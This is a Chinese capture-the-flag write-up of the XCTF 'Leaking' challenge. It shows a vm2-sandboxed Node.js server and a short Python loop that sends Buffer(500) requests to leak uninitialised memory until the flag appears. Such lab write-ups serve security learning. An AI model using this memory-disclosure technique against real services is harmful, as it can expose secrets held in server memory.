訪問題目地址

"use strict";var randomstring = require("randomstring"); var express = require("express"); var {VM } = require("vm2"); var fs = require("fs");var app = express(); var flag = require("./config.js").flagapp.get("/", function(req, res) {res.header("Content-Type", "text/plain");/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));} else {res.send(fs.readFileSync(__filename).toString());} });app.listen(3000, function() {console.log("listening on port 3000!"); });

簡單分析可以看出是一道關于node.js沙箱逃逸的問題，首先定義變量 flag，然后可以在沙箱里面執行任意的命令，那問題是如何逃逸出去呢？
Google了一下：

這兒的環境是 8.0 之前的，所以我們使用 Buffer()來讀取內存，這個和 Linux 讀內存原理差不多
直接上EXP：

# encoding=utf-8import requests import time url = 'http://your ip:port/?data=Buffer(500)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)time.sleep(0.1)if 'flag{' in response:print(response)break

拿到flag

flag{4nother_h34rtbleed_in_n0dejs}

思考：node.js沙箱逃逸的原理是甚么？

總結

以上是生活随笔為你收集整理的xctf攻防世界Leaking wp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。